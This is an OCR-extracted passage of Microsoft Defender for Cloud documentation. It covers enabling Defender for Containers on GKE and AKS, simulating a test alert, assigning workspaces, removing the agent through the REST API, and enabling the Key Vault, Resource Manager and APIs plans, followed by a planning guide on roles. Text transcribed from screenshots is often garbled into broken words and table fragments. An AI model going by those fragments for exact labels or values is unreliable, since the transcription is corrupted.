write access to GKE control plane configuration and will create and manage its own resources in your GCP account. 


iv} Project details © Select plans (3) Configure access 


D Copy script to GCP Cloud Shell 


A Cloud Shell template to configure access on GCP side has been created according to the plans selected in the previous tab. 


GCP Cloud Shell > 


8. Select the GCP Cloud Shell button. 
9. Paste the script into the Cloud Shell terminal, and run it. 


The connector will update after the script executes. This process can take up to 6-8 
hours up to complete. 


10. Select Next: Review and Generate>. 


11. Select Update. 


O Note 


To enable or disable individual Defender for Containers capabilities, either globally 
or for specific resources, see How to enable Microsoft Defender for Containers 


components. 


Deploy the solution to specific clusters 


If you disabled any of the default auto provisioning configurations to Off, during the 
GCP connector onboarding process, or afterwards. You need to manually install Azure 
Arc-enabled Kubernetes, the Defender agent, and Azure Policy for Kubernetes to each of 
your GKE clusters to get the full security value out of Defender for Containers. 


There are two dedicated Defender for Cloud recommendations you can use to install the 
extensions (and Arc if necessary): 


e GKE clusters should have Microsoft Defender's extension for Azure Arc 


installed 


@ GKE clusters should have the Azure Policy extension installed 


O Note 


When installing Arc extensions, you must verify that the GCP project provided is 


identical to the one in the relevant connector. 


To deploy the solution to specific clusters: 
1. Sign in to the Azure portal £. 


2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Recommendations. 


4. From Defender for Cloud's Recommendations page, search for each one of the 


recommendations above by name. 


= _ Microsoft Azure (Preview) 
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#3 Workflow automation 


5. Select an unhealthy GKE cluster. 


© Important 


You must select the clusters one at a time. 


Don't select the clusters by their hyperlinked names: select anywhere else in 


the relevant row. 


6. Select the name of the unhealthy resource. 


7. Select Fix. 


GKE clusters should have Micros: 


ay Open query 


Severity Freshness interval 


| High d 6 Hours 


^ Description 


Microsoft Defender’s cluster extension provides security capat 
The extension works with Azure Arc-enabled Kubernetes. 


Learn more about Microsoft Defender for Cloud's security feat 
vV Remediation steps 
^ Affected resources 


Unhealthy resources (4) Healthy resources (5) 


| © Search GCP resources 


Name 


@) protected-demo 


@ gke-vanilla 


@ gke-protected 


Fix Trigger logic app 


8. Defender for Cloud generates a script in the language of your choice: 


e For Linux, select Bash. 
e For Windows, select PowerShell. 


9. Select Download remediation logic. 
10. Run the generated script on your cluster. 


11. Repeat steps 3 through 10 for the second recommendation. 


Next steps 


e For advanced enablement features for Defender for Containers, see the Enable 
Microsoft Defender for Containers page. 


e Overview of Microsoft Defender for Containers. 


How to enable Microsoft Defender for 
Containers components 


Article e 08/13/2023 


Microsoft Defender for Containers is the cloud-native solution for securing your 
containers. 


Defender for Containers protects your clusters whether they're running in: 


e Azure Kubernetes Service (AKS) - Microsoft's managed service for developing, 
deploying, and managing containerized applications. 


e Amazon Elastic Kubernetes Service (EKS) in a connected Amazon Web Services 
(AWS) account - Amazon's managed service for running Kubernetes on AWS 
without needing to install, operate, and maintain your own Kubernetes control 


plane or nodes. 


e Google Kubernetes Engine (GKE) in a connected Google Cloud Platform (GCP) 
project - Google’s managed environment for deploying, managing, and scaling 
applications using GCP infrastructure. 


e Other Kubernetes distributions (using Azure Arc-enabled Kubernetes) - Cloud 
Native Computing Foundation (CNCF) certified Kubernetes clusters hosted on- 
premises or on laaS. For more information, see the On-prem/laaS (Arc) section of 
Supported features by environment. 


Learn about this plan in Overview of Microsoft Defender for Containers. 
You can first learn how to connect and protect your containers in these articles: 


e Protect your Azure containers with Defender for Containers 

e Protect your on-premises Kubernetes clusters with Defender for Containers 

e Protect your Amazon Web Service (AWS) accounts containers with Defender for 
Containers 

e Protect your Google Cloud Platform (GCP) project containers with Defender for 
Containers 


You can also learn more by watching these videos from the Defender for Cloud in the 
Field video series: 


e Microsoft Defender for Containers in a multicloud environment 
e Protect Containers in GCP with Defender for Containers 


Network requirements 


Validate the following endpoints are configured for outbound access so that the 
Defender agent can connect to Microsoft Defender for Cloud to send security data and 


events: 


See the required FQDN/application rules for Microsoft Defender for Containers. 


By default, AKS clusters have unrestricted outbound (egress) internet access. 


Enable the plan 


To enable the plan: 


1. From Defender for Cloud's menu, open the Settings page and select the relevant 


subscription. 


2. In the Defender plans page £ , select Defender for Containers and select Settings. 


lome > Microsoft Defender for Cloud | Environment settings 


gı Settings | Defender plans 


e with billing applying only for Server 


> 
b 
9 
9 


automatic discounts willt In promotion 


Q Tip 


If the subscription already has Defender for Kubernetes and/or Defender for 
container registries enabled, an update notice is shown. Otherwise, the only 


option will be Defender for Containers. 


ğ Open-source relational databases 9 servers ZA of ) 


= Storage 10 storage accounts LG dE 


GO Containers 2 container registries; 24 kub... 


dd Kubernetes (deprecated) 24 kubernetes cores © Update available © 
d Container registries (deprecated) 2 container registries © Update available © 
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3. Turn the relevant component on to enable it. 


Home > Settings | Defender plans 


Settings & monitoring 
ASC DEMO 


E continue 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 


Defenders plans : Containers 


Component Description Defender plans Configuration Status 
Defender DaemonSet Deployed to each worker node, collects security-related data and sends it to Defender for analysis, Required jp 
for runtime protections and security capabilities provided by Defender for Containers. 
On Azure Kubernetes Service (AKS), will be deployed as a Security Profile. On Arc clusters, will be deployed 
as an Arc extension. 
Azure Policy for Kubernetes Ex wired to apply at-scale auditing, enforcements and safeguards on clustersina A - GE 
ce ner. e 
for ice (AKS), will be deployed as an add-on. On Arc clusters, will be deployed as an 
A 


O Note 


When you turn off Defender for Containers, the components are set to off and 
are not deployed to any more containers but they are not removed from 
containers that they are already installed on. 


By default, when enabling the plan through the Azure portal, Microsoft Defender for 
Containers is configured to automatically install required components to provide the 
protections offered by plan, including the assignment of a default workspace. 


You can assign a custom workspace through Azure Policy. 


If you don't want to automatically install the Defender for Containers monitoring 
components on your container resources, select Edit configuration for the Containers 
plan. Then, in the Settings & monitoring page, turn off automatic installation for each 
component. 


In addition, you can modify this configuration from the Defender plans page”. 


If you disable the automatic installation of any component, you can easily deploy the 
component to one or more clusters using the appropriate recommendation: 


e Policy Add-on for Kubernetes - Azure Kubernetes Service clusters should have the 
Azure Policy Add-on for Kubernetes installed £ 


e Azure Kubernetes Service profile - Azure Kubernetes Service clusters should have 
Defender profile enabled Z 


e Azure Arc-enabled Kubernetes Defender extension - Azure Arc-enabled 
Kubernetes clusters should have the Defender extension installed 7 


e Azure Arc-enabled Kubernetes Policy extension - Azure Arc-enabled Kubernetes 
clusters should have the Azure Policy extension installed £ 


O Note 


Microsoft Defender for Containers is configured to defend all of your clouds 
automatically. When you install all of the required prerequisites and enable all 
of the automatic installation capabilities. 


If you choose to disable all of the automatic installation configuration options, 
no agents, or components will be deployed to your clusters. Protection will be 
limited to the agentless features only. Learn which features are agentless in 
the availability section for Defender for Containers. 


Learn more about the roles used to provision Defender for Containers extensions. 


Deploy the Defender agent 


You can enable the Defender for Containers plan and deploy all of the relevant 
components from the Azure portal, the REST API, or with a Resource Manager template. 
For detailed steps, select the relevant tab. 


Once the Defender agent has been deployed, a default workspace will be automatically 
assigned. You can assign a custom workspace in place of the default workspace through 
Azure Policy. 


O Note 


The Defender agent is deployed to each node to provide the runtime protections 
and collect signals from those nodes using eBPF technology Z . 


Azure portal 


Use the fix button from the Defender for Cloud 
recommendation 


A streamlined, frictionless, process lets you use the Azure portal pages to enable 
the Defender for Cloud plan and setup auto provisioning of all the necessary 


components for defending your Kubernetes clusters at scale. 
A dedicated Defender for Cloud recommendation provides: 


e Visibility about which of your clusters has the Defender agent deployed 
e Fix button to deploy it to those clusters without the agent 


1. From Microsoft Defender for Cloud's recommendations page, open the 


Enable enhanced security security control. 


. Use the filter to find the recommendation named Azure Kubernetes Service 


N 


clusters should have Defender profile enabled. 


Q Tip 


Notice the Fix icon in the actions column 


el 


Select the clusters to see the details of the healthy and unhealthy resources - 


clusters with and without the agent. 


4. From the unhealthy resources list, select a cluster and select Remediate to 
open the pane with the remediation confirmation. 


LI 


. Select Fix X resources. 


Simulate security alerts from Microsoft 
Defender for Containers 


A full list of supported alerts is available in the reference table of all Defender for Cloud 


security alerts. 


1. To simulate a security alert, run the following command from the cluster: 


Console 


kubectl get pods --namespace=asc-alerttest-662jf1i039n 


The expected response iS No resource found. 


Within 30 minutes, Defender for Cloud detects this activity and trigger a security 
alert. 


2. In the Azure portal, open Microsoft Defender for Cloud's security alerts page and 
look for the alert on the relevant resource: 


Microsoft Azure (Preview) ® Search resources, services, and docs (G+/) 


Home > Microsoft Defender for Cloud 


Q Microsoft Defender for Cloud | Security alerts x 
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A * r ics ® 
° egutera Severity Ty Alert title Ty Affected resource Ty Activity start tim. A MITRE ATT&CK® tactics St Alert description 
o Low @ Role binding to the cluster-admin role detected E ASC-Arc-K8S-demo 01/18/21, 01:16 PM à 
Microsoft Defender tor Cloud K: 
ow o in AKS detected E ASC-Arc-K8S-demo 01/18/21, 01:16 PM a e 
Management resources. Attackers can use 
BN Mediu Š asc. 01/18/21, 01:16 PM 
I Pricing & settings — 
Low EO ASC-Arc-K8S-demo 01/18/21, 01:16 PM 
Security policy 
ws Medium int detect... HB ASC- lemo 01/18/21, 01:16 PM Affected resource 
Security solutions 
Gata e Medium E ASC-Arc-K8S-demo 01/18/21, 01:16 PM JEZ, ASC-Arc-K8S-demo 
TA Workflow automation (EE Arc Kubernetes service 
d Coverage Ù f tow E ASC-Arc-K8S-demo 01/18/21, 01:16 PM 
@ Cloud connectors (Preview) Low E ASC-Arc-KBS-demo 01/18/21, 01:16 PM ? Subscription 
Medium Š ASC-Arc-K8S-demo 01/18/21, 01:16 PM 
Medium E ASC-Arc-K8S-demo 01/18/21, 01:16 PM 
MITRE ATT&CK® tactics O 
| High th.. B ASC-Arc-K8S-demo 01/18/21, 01:16 PM 
o Persistence > 
| Medium F e 01/18/21, 01:56 AM 
TIN sedium nwa... E serverif-test 01/18/21 01:56 AM xt rda] Sein 


Default Log Analytics workspace for AKS 


The Log Analytics workspace is used by the Defender agent as a data pipeline to send 
data from the cluster to Defender for Cloud without retaining any data in the Log 
Analytics workspace itself. As a result, users won't be billed in this use case. 


The Defender agent uses a default Log Analytics workspace. If you don't already have a 
default Log Analytics workspace, Defender for Cloud will create a new resource group 
and default workspace when the Defender agent is installed. The default workspace is 
created based on your region. 


The naming convention for the default Log Analytics workspace and resource group is: 
e Workspace: DefaultWorkspace-[subscription-|ID]-[geo] 


e Resource Group: DefaultResourceGroup-[geo] 


Assign a custom workspace 


When you enable the auto-provision option, a default workspace will be automatically 
assigned. You can assign a custom workspace through Azure Policy. 


To check if you have a workspace assigned: 
1. Sign in to the Azure portal £. 


2. Search for and select Policy. 


Microsoft Azure Preview a & 


All Services (7) Resources (12) Resource Groups (7) Marketplace (12) Documer 


Azure services 


-+ | 


Azure Active Directory (39) 


Services 

Create a f 

deratzi ? Time Series Insights access ZON 
& Firewall Policies DG Application security groups 


3. Select Definitions. 


4. Search for policy ID 64def556-fbad-4622-930e-72d1d5589bf5. 


Home > Poli 


fo) Policy | Definitions x 


5. Select Configure Azure Kubernetes Service clusters to enable Defender profile. 


6. Select Assignment. 


Home > Policy > 


Configure Azure Kubernetes Service clusters to enable Defender profile 


Policy definition 


E> Assign E t D Duplicate definition Dele e GO Export definition 


“ Essentials 


Name : Configure Azure Kubernetes Service clusters to enable Defender profile Definition location : -- 

Description : Microsoft Defender for Containers provides cloud-native Kubernetes security capabilities including environment hardening, workload protection, ... Definition ID : /provi 
Available Effects : DeploylfNotExists, Disabled Type : Built-i 
Category : Kubernetes Mode Indexe 


Definition Assignments (2) | Parameters 


@ only 10 scopes are pre-selected. 


Scope Search 


10 selected | | Filter by name or ID.. 
name Scope 
@) Defender for Containers provisioning AKS Security Profile DEMO N 
®) Defender for Containers provisioning AKS Security Profile Sample 


7. Follow the Create a new assignment with custom workspace steps if the policy 
hasn't yet been assigned to the relevant scope. Or, follow the Update assignment 


with custom workspace steps if the policy is already assigned and you want to 
change it to use a custom workspace. 


Create a new assignment with custom workspace 


If the policy hasn't been assigned, you'll see Assignments (@). 


Home > Policy > 


[Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile 


Policy definition 
E> Assign D Duplicate definition GO Export definition 
A Essentials 


Name : [Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile 


Description : Microsoft Defender for Containers provides cloud-native Kubernetes security capabilities including environment hardening, workload protection, ... 


A 


Available Effects : DeploylfNotExists, Disabled 


Category : Kubernetes 


Definition | Assignments (0) Parameters 


To assign custom workspace: 


1. Select Assign. 


2. In the Parameters tab, deselect the Only show parameters that need input or 
review option. 


3. Select a LogAnalyticsWorkspaceResource ID from the dropdown menu. 


Home > Policy > [Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile 


Defender for Containers provisioning AKS Security Profile 


Defender for Containers provisioning AKS Security Profile > 


Basics Parameters Remediation Non-compliance messages Review + save 


LogAnalyticsWorkspaceResource (_] Only show parameters that need input or review 


LogAnalyticsWorkspaceResourceld © 


4. Select Review + create. 


5. Select Create. 


Update assignment with custom workspace 


If the policy has already been assigned to a workspace, you'll see Assignments (1). 


Home > Policy > 


[Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile 


Policy definition 


E Assign Edit de D Duplicate definition | e de GO Export definition 
“ Essentials 


Name : [Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile 
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Available Effects : DeploylfNotExists, Disabled 


Category : Kubernetes defender-for-contait 
Definition | Assignments (1) Parameters Q 
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O Note 


If you have more than one subscription the number may be higher. 


To assign custom workspace: 


1. Select the relevant assignment. 


Home > Policy 


[Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile 
Policy definition 


D Assign Edit det D Duplicate definition [li] Delete definition > Export definition 
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2. Select Edit assignment. 


3. In the Parameters tab, deselect the Only show parameters that need input or 
review option. 


4. Select a LogAnalyticsWorkspaceResource ID from the dropdown menu. 


Home > Policy > [Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile > 


Defender for Containers provisioning AKS Security Profile 


Defender for Containers provisioning AKS Security Profile > 


Basics Parameters Remediation Non-compliance messages Review + save 


LogAnalyticsWorkspaceResource TI 


Only show parameters that need input or review 


LogAnalyticsWorkspaceResourceld © 


5. Select Review + save. 


6. Select Save. 


Remove the Defender agent 


To remove this - or any - Defender for Cloud extension, it's not enough to turn off auto 


provisioning: 


e Enabling auto provisioning, potentially impacts existing and future machines. 
e Disabling auto provisioning for an extension, only affects the future machines - 
nothing is uninstalled by disabling auto provisioning. 


Nevertheless, to ensure the Defender for Containers components aren't automatically 
provisioned to your resources from now on, disable auto provisioning of the extensions 
as explained in Configure auto provisioning for agents and extensions from Microsoft 
Defender for Cloud. 


You can remove the extension using the REST API or a Resource Manager template as 


explained in the tabs below. 


REST API 


Use REST API to remove the Defender agent from AKS 
To remove the extension using the REST API, run the following PUT command: 


HTTP 


https://management.azure.com/subscriptions/{{SubscriptionId}}/resourcegr 
oups/{{ResourceGroup}}/providers/Microsoft.ContainerService/managedClust 
ers/{{ClusterName}}?api-version={{ApiVersion}} 


Name Description Mandatory 
Subscriptionld Cluster's subscription ID Yes 
ResourceGroup Cluster's resource group Yes 
ClusterName Cluster's name Yes 
ApiVersion API version, must be >= 2022-06-01 Yes 


Request body: 


HTTP 


{ 


"location": "{{Location}}", 
"properties": { 
"securityProfile": { 
"defender": { 
"securityMonitoring"”: { 
"enabled": false 


} 


Request body parameters: 


Name 


location 


properties.securityProfile.defender.securityMonitoring.enabled 


Learn more 


You can check out the following blogs: 


Description 


Cluster's 
location 


Determines 
whether to 
enable or 
disable 
Microsoft 
Defender for 
Containers 
on the cluster 


Mandatory 


Yes 


Yes 


e Protect your Google Cloud workloads with Microsoft Defender for Cloud “ 


e Introducing Microsoft Defender for Containers E 


e Anew name for multicloud security: Microsoft Defender for Cloud Z 


Next steps 


Now that you enabled Defender for Containers, you can: 


e Scan your ACR images for vulnerabilities 
e Scan your Amazon AWS ECR images for vulnerabilities 


e Check out common questions about Defender for Containers. 


Protect your key vaults with Defender 
for Key Vault 


Article e 07/05/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection for 
Azure Key Vault, providing an additional layer of security intelligence. 


Learn more about Microsoft Defender for Key Vault. 


You can learn more about Defender for Key Vault's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


Enable the Key Vault plan 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 


monitoring systems. 
To enable Defender for Key Vault plan on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Key Vault plan to On. 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Key Vault 


Status 


Protect your resources with Defender 
for Resource Manager 


Article e 07/05/2023 


Azure Resource Manager is the deployment and management service for Azure. It 
provides a management layer that enables you to create, update, and delete resources 
in your Azure account. You use management features, like access control, locks, and 


tags, to secure and organize your resources after deployment. 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


Learn more about Microsoft Defender for Resource Manager. 


You can learn more about Defender for Resource Manager's pricing on the pricing 
page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


Enable the Resource Manager plan 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


To enable the Defender for Resource Manager plan on your subscription: 
1. Sign in to the Azure portal Z. 


2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Resource Manager plan to On. 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected, The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the pricing pag: 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Resource Manager 


Protect your APIs with Defender for 
APIs (Preview) 


Article e 06/29/2023 


Defender for APIs in Microsoft Defender for Cloud offers full lifecycle protection, 
detection, and response coverage for APIs. 


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


Learn more about the Microsoft Defender for APIs plan in the Microsoft Defender for 
Cloud. Defender for APIs is currently in preview. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Review Defender for APIs support, permissions, and requirements before you 
begin deployment. 


e You enable Defender for APIs at the subscription level. 

e Ensure that APIs you want to secure are published in Azure API management. 
Follow these instructions to set up Azure API Management. 

© Note 


This article describes how to enable and onboard the Defender for APIs plan in the 
Defender for Cloud portal. Alternately, you can enable Defender for APIs within an 
API Management instance in the Azure portal. 


Enable the Defender for APIs plan 


1. Sign into the portal”, and in Defender for Cloud, select Environment settings. 


2. Select the subscription that contains the managed APIs that you want to protect. 


3. In the APIs plan, select On. Then select Save. 


e Settings | Defender plans 


loud Security Postur 


Goud Workload Protection (CWP) 


ene gor i 


4. Select Save. 


O Note 


After enabling Defender for APIs, onboarded APIs take up to 50 minutes to appear 
in the Recommendations tab. Security insights are available in the Workload 
protections > API security dashboard within 40 minutes of onboarding. 


Onboard APIs 


1. In the Defender for Cloud portal, select Recommendations. 
2. Search for Defender for APIs. 


3. Under Enable enhanced security features, select the security recommendation 
Azure API Management APIs should be onboarded to Defender for APIs. 


Home > Microsoft Defender for Cloud 
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4. In the recommendation page, you can review the recommendation severity, 
update interval, description, and remediation steps. 


5. Review the resources in scope for the recommendations: 


e Unhealthy resources: Resources that aren't onboarded to Defender for APIs. 
e Healthy resources: API resources that are onboarded to Defender for APIs. 


e Not applicable resources: API resources that aren't applicable for protection. 


6. In Unhealthy resources, select the APIs that you want to protect with Defender for 
APIs. 


7. Select Fix. 


Home > Microsoft Defender for Cloud | Recommendations 
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8. In Fixing resources, review the selected APIs, and select Fix resources. 


Home > Microsoft Defender for Cloud | Recommendations 


Fixing resources 
Azure API Management APIs should be onboarded to Defender for APIs deda 


By selecting "Fix" on the selected API Collections, these AP! Collections will be 
T Open query 


onboarded to Defender for APIs and will be monitored for security coverage. 
Severity Freshness interval 
[High GO 30 Min Selected resources 
EG 642d7c1edb9636d7db2ed138 
EZ defenderapi 
v Description 


v Remediation steps 
^ Affected resources 


Unhealthy resources (2) Healthy resources (4) Not applicable resources (0) 


SO Search azure resources 


B name TL Display name Subscription Azure API Management res... Oy 
E & defenderapi Defender API CyberSecSOC DefenderAPIDemo sa 
E © 642d7cledb9636d7db2cd138 Contoso Hotels API CyberSecSOC DefenderAPIDeme sa 


Te EEE ; 


9. Verify that remediation was successful. 


POE E  EEO 


Home > Microsoft Defender for Cloud | Recommendations Notifications 
Azure API Management APIs should be onboarded to Defender for APIs 
More events in the activity log -» Dismiss all 
EE Open query 
@ Remediation successful (Azure API Management APIs should be 
Severity Freshness interval onboarded to Defender for APIs) 
ie east remediated the en On the select 
[High © 30Min Note: You might need to refresh the page to se the 
resources’ tab 
Description 
v Remediation steps 
Affected resources 


Unhealthy resources (2)  Mealthy resource: 


[7] Name ty Display name Subscription Azure API Management res. Q A 


Not applicable resources (0) 


Track onboarded API resources 


After onboarding the API resources, you can track their status in the Defender for Cloud 
portal > Workload protections > API security. 


Home > Microsoft Defender for Cloud 


icrosoft Defender for Cloud | Workload protections 


yn ‘CyberSecSOC 


D Subscriptions C? What's new 


General 
@ Defender CSPM plan is now available. This plan provides enhanced posture capabilities and a new intelligent cloud security graph to help identify, prioritize and reduce risk Upgrade -> 

O Overview [Fully covered (96.7%) Se 

p Storage Servers DNS subscriptions Resource Manager s... 
@ Getting started Agent not installed (3.3%) Instal! SS o' a Oa 

GEA Not covered (0%) Upgrade Upgrade Upgrade 
@ Security alerts B 

i Security alerts 
@ Inventory 
ZZ High severity 
e Cloud Security Explorer 828 
@ Workbooks i Medium severity 
1K 
o Community A 
Lowseverity 

@ Diagnose and solve problems ; | 877 
ena sacarey | ERO EE EEE EEE E E EO E 
© Security posture a IE 4 Sat d w Fr Sun 11 Tue 15 Set E F 
@ Regulatory compliance Advanced protection 

Workload protections 
A EEE VM vulnerability assessment GO Just-in-time VM access E, Adaptive application control d Container image scanning A Adaptive network hardening HSQL vulnerability asse 
Mọ Firewall Manager 29 Unprotected 25 unprotected 22 Unprotected 2 Unprotected 15 Unprotected dd 
E DevOps Security (Preview) f 

Arc-enabled SQL Servers > File integrity monitori ren Network map loT security API security N 

Management B mo || de E 9 
e NONE unprotected 
i onm. 


Next steps 


Review API threats and security posture. 


Planning and operations guide 


Article e 02/27/2023 


This guide is for information technology (IT) professionals, IT architects, information 
security analysts, and cloud administrators planning to use Defender for Cloud. 


Planning guide 


This guide provides the background for how Defender for Cloud fits into your 
organization's security requirements and cloud management model. It's important to 
understand how different individuals or teams in your organization use the service to 
meet secure development and operations, monitoring, governance, and incident 
response needs. The key areas to consider when planning to use Defender for Cloud are: 


e Security Roles and Access Controls 

e Security Policies and Recommendations 
e Data Collection and Storage 

e Onboarding non-Azure resources 

e Ongoing Security Monitoring 

e Incident Response 


In the next section, you'll learn how to plan for each one of those areas and apply those 


recommendations based on your requirements. 


© Note 


Read Defender for Cloud common questions for a list of common questions that 
can also be useful during the designing and planning phase. 


Security roles and access controls 


Depending on the size and structure of your organization, multiple individuals and 
teams may use Defender for Cloud to perform different security-related tasks. In the 
following diagram, you have an example of fictitious personas and their respective roles 
and security responsibilities: 


Responsible for all aspects of security for the company 


Ellen 
CISO/CIO Wants to understand the company’s security posture 


across cloud workloads 


Needs to be informed of major attacks and risks 


David Judy Sam 
IT Security Security Ops Security Analyst 


Sets company security Monitors and responds Investigates attacks 
policies to ensure the to security alerts 24/7 Work with Cloud 
appropriate protections Workload Owner to 


are in place Escalates to Cloud apply remediation 
Workload Owner or 

Monitors compliance IT Security Analyst 

with policies 
Sometimes performed 

Generates reports for by a Managed Security 

leadership or auditors Provider 


Defender for Cloud enables these individuals to meet these various responsibilities. For 


example: 
Jeff (Workload Owner) 
e Manage a cloud workload and its related resources. 


e Responsible for implementing and maintaining protections in accordance with 
company security policy. 


Ellen (CISO/CIO) 
e Responsible for all aspects of security for the company. 
e Wants to understand the company's security posture across cloud workloads. 
e Needs to be informed of major attacks and risks. 
David (IT Security) 
e Sets company security policies to ensure the appropriate protections are in place. 
e Monitors compliance with policies. 
e Generates reports for leadership or auditors. 
Judy (Security Operations) 
e Monitors and responds to security alerts at any time. 


e Escalates to Cloud Workload Owner or IT Security Analyst. 


Sam (Security Analyst) 
e Investigate attacks. 
e Work with Cloud Workload Owner to apply remediation. 


Defender for Cloud uses Azure role-based access control (Azure Role-based access 
control), which provides built-in roles that can be assigned to users, groups, and services 
in Azure. When a user opens Defender for Cloud, they only see information related to 
resources they have access to. Which means the user is assigned the role of Owner, 
Contributor, or Reader to the subscription or resource group that a resource belongs to. 
In addition to these roles, there are two roles specific to Defender for Cloud: 


e Security reader: a user that belongs to this role is able to view only Defender for 
Cloud configurations, which include recommendations, alerts, policy, and health, 
but it won't be able to make changes. 


e Security admin: same as security reader but it can also update the security policy, 


dismiss recommendations and alerts. 


The personas explained in the previous diagram need these Azure Role-based access 


control roles: 
Jeff (Workload Owner) 
e Resource Group Owner/Contributor. 
Ellen (CISO/CIO) 
e Subscription Owner/Contributor or Security Admin. 
David (IT Security) 
e Subscription Owner/Contributor or Security Admin. 
Judy (Security Operations) 
e Subscription Reader or Security Reader to view alerts. 
e Subscription Owner/Contributor or Security Admin required to dismiss alerts. 
Sam (Security Analyst) 
e Subscription Reader to view alerts. 
e Subscription Owner/Contributor required to dismiss alerts. 


e Access to the workspace may be required. 


Some other important information to consider: 


e Only subscription Owners/Contributors and Security Admins can edit a security 
policy. 


e Only subscription and resource group Owners and Contributors can apply security 
recommendations for a resource. 


When planning access control using Azure Role-based access control for Defender for 
Cloud, make sure you understand who in your organization needs access to Defender 
for Cloud the tasks they'll perform. Then you can configure Azure Role-based access 
control properly. 


© Note 


We recommend that you assign the least permissive role needed for users to 
complete their tasks. For example, users who only need to view information about 
the security state of resources but not take action, such as applying 
recommendations or editing policies, should be assigned the Reader role. 


Security policies and recommendations 


A security policy defines the desired configuration of your workloads and helps ensure 
compliance with company or regulatory security requirements. In Defender for Cloud, 
you can define policies for your Azure subscriptions, which can be tailored to the type of 
workload or the sensitivity of data. 


Defenders for Cloud policies contain the following components: 
e Data collection: agent provisioning and data collection settings. 


e Security policy: an Azure Policy that determines which controls are monitored and 
recommended by Defender for Cloud. You can also use Azure Policy to create new 
definitions, define more policies, and assign policies across management groups. 


e Email notifications: security contacts and notification settings. 


e Pricing tier: with or without Microsoft Defender for Cloud's Defender plans, which 
determine which Defender for Cloud features are available for resources in scope 
(can be specified for subscriptions and workspaces using the API). 


O Note 


Specifying a security contact ensures that Azure can reach the right person in your 
organization if a security incident occurs. Read Provide security contact details in 
Defender for Cloud for more information on how to enable this recommendation. 


Security policies definitions and recommendations 


Defender for Cloud automatically creates a default security policy for each of your Azure 
subscriptions. You can edit the policy in Defender for Cloud or use Azure Policy to create 
new definitions, define more policies, and assign policies across management groups. 
Management groups can represent the entire organization or a business unit within the 
organization. You can monitor policy compliance across these management groups. 


Before configuring security policies, review each of the security recommendations: 


e See if these policies are appropriate for your various subscriptions and resource 


groups. 
e Understand what actions address the security recommendations. 


e Determine who in your organization is responsible for monitoring and remediating 


new recommendations. 


Data collection and storage 


Defender for Cloud uses the Log Analytics agent and the Azure Monitor Agent to collect 
security data from your virtual machines. Data collected from this agent is stored in your 
Log Analytics workspaces. 


Agent 


When automatic provisioning is enabled in the security policy, the data collection agent 
is installed on all supported Azure VMs and any new supported VMs that are created. If 
the VM or computer already has the Log Analytics agent installed, Defender for Cloud 
uses the current installed agent. The agent's process is designed to be non-invasive and 
have minimal effect on VM performance. 


If at some point you want to disable Data Collection, you can turn it off in the security 
policy. However, because the Log Analytics agent may be used by other Azure 
management and monitoring services, the agent won't be uninstalled automatically 
when you turn off data collection in Defender for Cloud. You can manually uninstall the 
agent if needed. 


O Note 


To find a list of supported VMs, read the Defender for Cloud common questions. 


Workspace 


A workspace is an Azure resource that serves as a container for data. You or other 
members of your organization might use multiple workspaces to manage different sets 
of data that is collected from all or portions of your IT infrastructure. 


Data collected from the Log Analytics agent can be stored in an existing Log Analytics 


workspace associated with your Azure subscription or a new workspace. 


In the Azure portal, you can browse to see a list of your Log Analytics workspaces, 
including any created by Defender for Cloud. A related resource group is created for 
new workspaces. Resources are created according to this naming convention: 


e Workspace: DefaultWorkspace-[subscription-ID]-[geo] 
e Resource Group: DefaultResourceGroup-[geo] 


For workspaces created by Defender for Cloud, data is retained for 30 days. For existing 
workspaces, retention is based on the workspace pricing tier. If you want, you can also 
use an existing workspace. 


If your agent reports to a workspace other than the default workspace, any Defender for 
Cloud Defender plans that you've enabled on the subscription should also be enabled 
on the workspace. 


O Note 


Microsoft makes strong commitments to protect the privacy and security of this 
data. Microsoft adheres to strict compliance and security guidelines—from coding 
to operating a service. For more information about data handling and privacy, read 
